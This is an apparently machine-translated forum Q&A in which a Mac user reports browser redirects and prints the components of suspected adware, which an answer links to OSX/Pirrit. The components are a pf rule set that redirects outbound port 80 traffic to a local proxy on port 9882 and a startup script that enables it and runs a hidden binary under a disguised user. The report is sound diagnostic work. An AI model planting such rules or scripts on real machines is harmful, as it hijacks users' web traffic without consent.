pseudohydrophobia प्रक्रिया मैक


0

हाल ही में जब मैंने अपने MBP 10.10.5 Yosemite में एक वेब पेज ब्राउज़ किया, तो मैंने नोट करना शुरू किया कि क्रोम कैनरी संस्करण 53 एक नया टैब खोल रहा था या कुछ पृष्ठ नहीं खुल रहे थे ... यह टैब मुझे यादृच्छिक पृष्ठों पर पुनर्निर्देशित कर रहा था।

मैंने फ़ायरवॉल को सक्रिय किया और देखा कि एक कॉल कॉल pseudohydrophobia आने वाले कनेक्शन को खोलने की कोशिश कर रहा था

/etc/pseudohydrophobia.conf

    rdr pass inet proto tcp from en0 to any port 80 -> 127.0.0.1 port 9882
    pass out on en0 route-to lo0  inet proto tcp from en0 to any port 80 keep state
    pass out proto tcp all user volutate

/etc/pseudohydrophobia.sh

#!/bin/sh

if [ -a /Library/pseudohydrophobia/Contents/MacOS/pseudohydrophobia ];
then
sleep 10
sudo pfctl -evf /etc/pseudohydrophobia.conf
sudo -u volutate /Library/pseudohydrophobia/Contents/MacOS/pseudohydrophobia
fi
exit 0

बंदरगाहों:

netstat -an | grep 9882
tcp4       0      0  *.9882                 *.*                    LISTEN  

/etc/pseudohydrophobia.conf

rdr pass inet proto tcp from en0 to any port 80 -> 127.0.0.1 port 9882
pass out on en0 route-to lo0  inet proto tcp from en0 to any port 80 keep state
pass out proto tcp all user volutate

मैं यह सभी स्क्रिप्ट और बाइनरी हटा दूंगा लेकिन इसे Google के किसी भी संदर्भ को खोजने के लिए पोस्ट नहीं करना चाहता।


एक विलोपन और रिबूट के बाद, प्रक्रिया का नाम और उपयोगकर्ता बदल गया ... स्टेटरूप लिपियों में दिखेगा
user260826

जवाबों:


1

Https://objective-see.com/blog/blog_0x0E.html पर एक नज़र डालें

एक घुसपैठ पार मंच Adware का विश्लेषण; OSX / Pirrit

यह पिशिट मालवेयर हो सकता है।

उपयोगकर्ता नाम volutateऔर फ़ाइल नाम ( pseudohydrophobia) बेतरतीब ढंग से उत्पन्न नहीं होते हैं, लेकिन पोर्टब्नंबर 9882 समान है ...

हमारी साइट का प्रयोग करके, आप स्वीकार करते हैं कि आपने हमारी Cookie Policy और निजता नीति को पढ़ और समझा लिया है।
Licensed under cc by-sa 3.0 with attribution required.